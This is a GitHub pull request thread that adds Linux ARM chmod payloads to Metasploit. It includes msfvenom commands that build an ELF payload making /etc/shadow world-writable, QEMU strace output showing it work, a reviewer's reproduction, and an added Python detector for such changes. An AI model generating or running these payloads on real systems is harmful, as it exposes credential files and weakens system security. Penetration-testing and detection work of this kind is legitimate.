@bcoles bcoles commented Jan 5, 2026

Add Linux ARM 32-bit / 64-bit Little Endian chmod payloads.

Tested with QEMU.

Verification

ARM Little Endian (armle) (32-bit)

Generate a Linux Chmod payload (with optional NOP sled):

./msfvenom -n 100 --format elf -p linux/armle/chmod FILE="/etc/shadow" MODE="0777" > chmod.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-arm -strace ./chmod.elf ; ls -la /etc/shadow
1132678 chmod("/etc/shadow",0777) = -1 errno=1 (Operation not permitted)
1132678 exit(0)
-rw-r----- 1 root shadow 1874 Jan 24  2025 /etc/shadow
$ sudo /home/user/qemu/build/qemu-arm -strace ./chmod.elf ; ls -la /etc/shadow
1132685 chmod("/etc/shadow",0777) = 0
1132685 exit(0)
-rwxrwxrwx 1 root shadow 1874 Jan 24  2025 /etc/shadow

Note the payload was executed successfully and the file permissions were changed.

ARM (aarch64) (64-bit)

Generate a Linux Chmod payload (with optional NOP sled):

./msfvenom -n 100 --format elf -p linux/aarch64/chmod FILE="/etc/shadow" MODE="0777" > chmod.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-aarch64 -strace ./chmod.elf ; ls -la /etc/shadow
1132844 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = -1 errno=1 (Operation not permitted)
1132844 exit(0)
-rw-r----- 1 root shadow 1874 Jan 24  2025 /etc/shadow
$ sudo /home/user/qemu/build/qemu-aarch64 -strace ./chmod.elf ; ls -la /etc/shadow
1132849 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = 0
1132849 exit(0)
-rwxrwxrwx 1 root shadow 1874 Jan 24  2025 /etc/shadow

Note the payload was executed successfully and the file permissions were changed.
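Added example (not part of this PR or of Metasploit's code): a defender-side check that parses strace-style lines like the ones above and flags mode changes that open a watched file to "other" users. It covers both syscalls seen in the traces, `chmod` on armle and `fchmodat` on aarch64. The watched-path set, the function names and the last sample line are assumptions constructed for this example.

```python
import re

# Line shapes as printed by `qemu-* -strace` in the output above:
#   <pid> chmod("<path>",<mode>) = <ret> ...
#   <pid> fchmodat(AT_FDCWD,"<path>",<mode>,<flags>) = <ret> ...
SYSCALL_RE = re.compile(
    r'^(?P<pid>\d+) (?P<call>chmod|fchmodat)\('
    r'(?:[^,"]+,)?"(?P<path>[^"]*)",(?P<mode>[0-7]+)(?:,[^)]*)?\)'
    r' = (?P<ret>-?\d+)'
)

WATCHED_PATHS = {"/etc/shadow"}  # assumption: files that must never be opened up
OTHER_BITS = 0o007               # read/write/execute for "other"


def find_risky_chmods(lines, watched=WATCHED_PATHS):
    """Return one finding per chmod/fchmodat granting 'other' access on a watched path."""
    findings = []
    for line in lines:
        m = SYSCALL_RE.match(line.strip())
        if not m:
            continue  # not a mode-change syscall line
        mode = int(m["mode"], 8)
        if m["path"] in watched and mode & OTHER_BITS:
            findings.append({
                "pid": int(m["pid"]),
                "syscall": m["call"],
                "path": m["path"],
                "mode": oct(mode),
                "succeeded": int(m["ret"]) == 0,
            })
    return findings


# The first four lines are copied from the traces above; the last is constructed.
SAMPLE = [
    '1132678 chmod("/etc/shadow",0777) = -1 errno=1 (Operation not permitted)',
    '1132685 chmod("/etc/shadow",0777) = 0',
    '1132844 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = -1 errno=1 (Operation not permitted)',
    '1132849 fchmodat(AT_FDCWD,"/etc/shadow",0777,0) = 0',
    '4242 chmod("/tmp/build.log",0644) = 0',
]

if __name__ == "__main__":
    for f in find_risky_chmods(SAMPLE):
        state = "APPLIED" if f["succeeded"] else "denied"
        print(f'{state:8} pid={f["pid"]} {f["syscall"]} {f["path"]} -> {f["mode"]}')
```

Denied attempts are kept as findings because a failed mode change on a watched file is still worth an alert.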

@dledda-r7

Hi @bcoles, would you mind passing msftidy on the module? thanks!

@bcoles bcoles force-pushed the linux-arm-chmod-payloads branch from f44151a to e245298 Compare January 13, 2026 14:04

bcoles commented Jan 13, 2026

> Hi @bcoles, would you mind passing msftidy on the module? thanks!

done


@dledda-r7 dledda-r7 left a comment


┌──(kali㉿kali)-[~/Public]
└─$ cat notread       
cat: notread: Permission denied
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ qemu-armel -strace chmod.armle.elf 
126530 chmod("/home/kali/Public/notread",0777) = 0
126530 exit(0)
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ cat notread 
oh no D:
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ cat notread 
cat: notread: Permission denied
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ chmod +x chmod.aarch64.elf 
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ qemu-aarch64 -strace chmod.aarch64.elf 
127162 fchmodat(AT_FDCWD,"/home/kali/Public/notread",0777,0) = 0
127162 exit(0)
                                                                                                            
┌──(kali㉿kali)-[~/Public]
└─$ cat notread               
oh no D:
                                                                                                            

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Jan 14, 2026
@dledda-r7 dledda-r7 merged commit e96c1e9 into rapid7:master Jan 14, 2026
44 of 48 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Jan 14, 2026
@bcoles bcoles deleted the linux-arm-chmod-payloads branch January 14, 2026 13:36
@sjanusz-r7 sjanusz-r7 added the rn-payload-enhancement release notes for enhanced payloads label Jan 15, 2026
@sjanusz-r7

Release Notes

Adds Linux ARM 32-bit / 64-bit Little Endian chmod payloads.
